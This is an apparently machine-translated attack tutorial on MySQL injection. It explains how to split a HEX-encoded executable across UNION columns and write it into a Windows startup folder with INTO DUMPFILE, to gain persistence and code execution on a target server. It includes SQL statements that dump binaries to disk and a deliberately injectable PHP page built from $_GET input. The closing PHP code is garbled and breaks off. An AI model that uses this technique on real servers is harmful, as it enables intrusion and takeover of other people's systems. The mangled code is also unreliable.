How to export executable files to startup items and instances in MYSQL Injection

Author:Sai52 [B. H.S. T]

Preface

I mentioned in the article "Several Methods and Applications for reading files under mysql" that theoretically export executable binary files to startup items in mysql injection, the principles and examples are provided for your reference.

Everyone knows the conditions for exporting files in MYSQL injection, to export executable binary files, you must also inject fields (such as BLOB or LONGBLOB data type) in the binary encoding format ). To export the executable bat file, there is no requirement on the field data type. Other additional restrictions depend on the environment.

If the injection page cannot expose the physical path, you can use this method to obtain the permission if the preceding conditions are met.

Implementation Principle

After the executable files are encoded with HEX (), the exported files are segmented and UNHEX () decoded to all HEX () encoded file segments. The exported files are reorganized into complete files.

For more information about the following, see.

1. Fields of different data types can store data of the same encoding method.

In a MYSQL database, to access data of different encoding methods, the column data type must correspond to the encoding method of the data to be accessed. When the data stored in columns of different data types in the table adopts the same encoding method, although the data types of each column are different, there is only one encoding method in the table. Therefore, when a file is divided into multiple segments based on the number of columns in the data table and stored in columns of different data types in the same encoding mode, if the data in the entire data table is exported to the same file in column order, the data can be reorganized and restored to a complete file of the same encoding. The HEX Encoding Method belongs to almost all data types, such as int, text, blob, data... files encoded by hex () within the storage range of other data types can be stored legally.

2. Storage scope of each data type

We usually use UNION queries in injection to match fields by number to meet the applicable conditions of select_expression (that is, the number of fields and field data types checked after UNION should be the same as those listed at the beginning. SELECT ), this is because the digital service belongs to almost all data types, so it can match any field. The HEX Encoding method also belongs to almost all data types. Therefore, we can use the HEX () function to encode a file, then, the encoded file is divided into multiple data segments based on the number of columns in the data table. Each segment of data matches the corresponding fields in order, constructs the injected URL, and exports the complete file.

When you segment a HEX () encoded file, you need to know the storage range of each data type to determine the length of each field of the injection point and the storage encoding range, in order to put the longest segment data on the fields with the largest storage range. For more information, see MySQL Data Type introduction (http://www.sai52.com/archives/769 ).

3. Methods of using different injection points due to the characteristics of UNION

MYSQL can export a complete file with any file name as long as the data can be fully stored in the corresponding data type column. That is to say, after the binary file is HEX () encoded, it can be stored on non-binary encoded fields such as the TEXT data type. During export, the UNHEX () decoding can still be saved as a complete binary file. For example

mysql>create table a (id int,cmd TEXT);mysql>insert into a (id,cmd) values (1,hex(load_file(c:\windows

\system32\regedt32.exe)));mysql>select unhex(cmd) FROM a where id =1 INTO DUMPFILE 

d:\regedt32.exe;

In the statement, unhex (cmd) has changed the Data Type of the selected field to binary. Therefore, you can export the Complete Binary file. When we use UNION to connect to the SELECT statement in the injection, the number and Data Type of fields queried after UNION must be the same as that of SELECT.

SELECT cmd FROM a where id=1 and 1=2 UNION SELECT unhex(cmd) FROM a 

INTO DUMPFILE d:\regedt32.exe;

The data type of the unhex (cmd) field in the statement is different from that of the previous cmd field. binary encoded data cannot be fully stored in the TEXT data type, therefore, the complete binary file cannot be exported. To export a Complete Binary file, the fields selected by SELECT must have data types that store data in binary format, such as BLOB and LONGBLOB. This is not required for exporting a bat file. Any type of field can be used as long as it is stored.

4. Features of INTO DUMPFILE

If you use into dumpfile to export data, MySQL writes only one row to the file, does not terminate any column or row, and does not perform any escape processing. Into dumpfile is a seamless connection. It can be used to export data from a column to a file, or to export data from a table to a file.

The UNHEX () function performs reverse operations from HEX. That is to say, it interprets every hexadecimal number in the parameter as a number and converts it to a character represented by this number. The result character is returned as a binary string. 0x and UNHEX () have the same meaning.

When columns of different data types in the table store all HEX encoded file segments in sequence, use the SELECT 0x file to perform hexadecimal data part1 and 0x file hexadecimal data part2, 0x file hexadecimal data part3 ,.... in the format of partN into dumpfile, all data in the table is exported to a new file. In this case, the HEX Encoding file segments in each column are restored to the corresponding sequence in the new file, it is then "seamlessly connected" to form a new file with the same encoding method and size as the original file, which is saved to the desired place, such as the startup Item.

5. Restrictions on data submission using GET and POST Methods

The injection point obtains data in GET mode, while the URL Length of the GET request is limited by the specific browser and server. (Note that this limit is the length of the whole URL, not just the Data Length of your parameter values ):

If the URL length exceeds the client browser limit, the browser does not respond when submitting the request.
If the URL length exceeds the server limit and the server does not process the request, the returned error message "Url Too Long" is returned ".

We recommend that you use the NC or data submission tool when submitting ultra-long URLs in GET mode.

The experiment shows that the maximum value allowed by the server to pass WEB page parameters in GET mode is about 16000 bytes (WIN2003 + IIS environment), that is, when the exported executable binary file is less than 7.9k, it can be exported normally. For POST injection points, the maximum length of submitted data is limited by server settings, such as php. ini settings.

6. Effect of default MYSQL character set on Dual-character encoding in the export path

Mysql5 provides several system variables for character sets. The value of character_set_client is the character set that MYSQL uses to obtain the data transmitted by the client.

MYSQL (installed by default) is set to latin1 in Swedish order. When we access the MySQL database through PHP by default, no matter which encoding method is used to send queries, MYSQL considers the transmitted data as latin1 encoding.

The two-byte character encoding data (such as Chinese, Japanese, and Korean) submitted by the web page (when the server does not have special settings) after being submitted, it is UTF-8 encoded by default (not related to the encoding set at the time of submission). MYSQL reads the code according to its default latin1 encoding. The text in double-character encoding is bound to be garbled, in this way, when you use into outfile or into dumpfile to export data to a file, the dual-character encoded text in the export path will be garbled, as a result, MYSQL fails to export the file because it cannot find the path displayed as garbled characters.

If the injected php program source code contains a similar

Mysql_query ("set names utf8 ");

Such settings enable the MYSQL server to read the utf8 Character Set of the data transmitted by the client. Then, the file can be exported to the directory named by double-byte characters during the injection, otherwise, MYSQL fails to export the file because it cannot find the path displayed as garbled characters.

 

Figure 01

Therefore, if the MYSQL server uses UTF Encoding, or the PHP connection to the MYSQL database contains a statement similar

Mysql_query ("set names utf8 ");

When setting, it is possible to export the file to the path of the Two-byte character encoding file. Otherwise, the export will fail. If the storage path of the exported file does not contain double-byte character encoding, there is no restriction.

Instance 1 exports the exe file to the startup Item (WIN2003 + IIS + PHP5 + MYSQL5 environment set up on the local machine magic_quotes_gpc = off)

PHP code: injection. php

<?$mysql_server_name = "localhost";$mysql_username = "root";$mysql_password = "123456";$mysql_database = "injection";$conn=mysql_connect( $mysql_server_name, $mysql_username, 

$mysql_password );mysql_select_db($mysql_database,$conn);mysql_query("SET NAMES utf8");$id=$_GET[id];$sql = "select * from test where id=$id";$result = mysql_db_query( $mysql_database, $sql,$conn );$row = mysql_fetch_row($result);p(

Border = "1">); p (<tbody>); p1 (); p (data type); p2 (); p (content); p3 (); p1 (); p (INT); p2 (); p ($ row [0]); p3 (); p1 (); p (BLOB); p2 (); p ($ row [1]); p3 (); p1 (); p (CHAR); p2 (); p ($ row [2]); p3 (); p1 (); p (DATE); p2 (); p ($ row [3]); p3 (); p1 (); p (LONGBLOB); p2 (); p ($ row [4]); p3 (); p1 (); p (TEXT); p2 (); p ($ row [5]); p3 (); p1 (); p (TIME); p2 (); p ($ row [6]); p3 (); p1 (); p (VARCHAR); p2 (); p ($ row [7]); p3 (); p (</tbody> </table> <td &